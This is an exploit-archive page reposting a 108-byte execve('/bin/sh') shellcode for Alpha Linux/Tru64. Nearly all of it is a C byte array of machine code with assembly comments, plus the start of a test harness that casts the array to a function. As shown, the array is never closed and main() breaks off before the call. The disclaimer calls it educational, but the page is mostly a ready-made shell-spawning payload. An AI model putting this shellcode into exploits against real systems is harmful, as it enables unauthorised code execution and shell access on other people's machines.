Linux/tru64 alpha execve(/bin/sh) shellcode (108 bytes) Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2019-03-25 | Type : shellcode | Platform : linux
This exploit / vulnerability Linux/tru64 alpha execve(/bin/sh) shellcode (108 bytes) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/* Alpha (AXP) Linux/Tru64 execve() shellcode
* ==========================================
* This shellcode uses the stack to store a generated
* "callsys" instruction, due to this it needs executable
* stack. To test on Linux use "execstack -s <bin>" and
* on Tru64 use "sysconfig -r proc executable_stack=1".
* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
* -- Hacker Fantastic (
#include <stdio.h>
#include <stdlib.h>

unsigned char shellcode[] = {
"\x80\xff\xde\x23" /* lda $sp,-128($sp) */
"\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
"\x2f\x2f\x21\x20" /* sll $1, 0x20 */
"\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
"\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
"\x2f\x62\x42\x20" /* stq $31, -32($sp) */
"\x01\x04\x22\x40" /* stq $31, -24($sp) */
"\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
"\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
"\xf8\xff\xfe\xb7" /* mov $sp, $16 */
"\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
"\x10\x04\xfe\x47" /* stq $16, -40($sp) */
"\x30\x15\x02\x42" /* mov $sp, $17 */
"\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
"\x11\x04\xfe\x47" /* mov $sp, $18 */
"\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
"\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
"\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
"\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
"\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
"\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
"\x84\xff\x3f\x20" /* subq $1, $2, $1 */
"\x01\xff\x5f\x20" /* stl $1, -48($sp) */
"\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
"\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */

int main(){
int (*func)();
func = (int (*)())shellcode;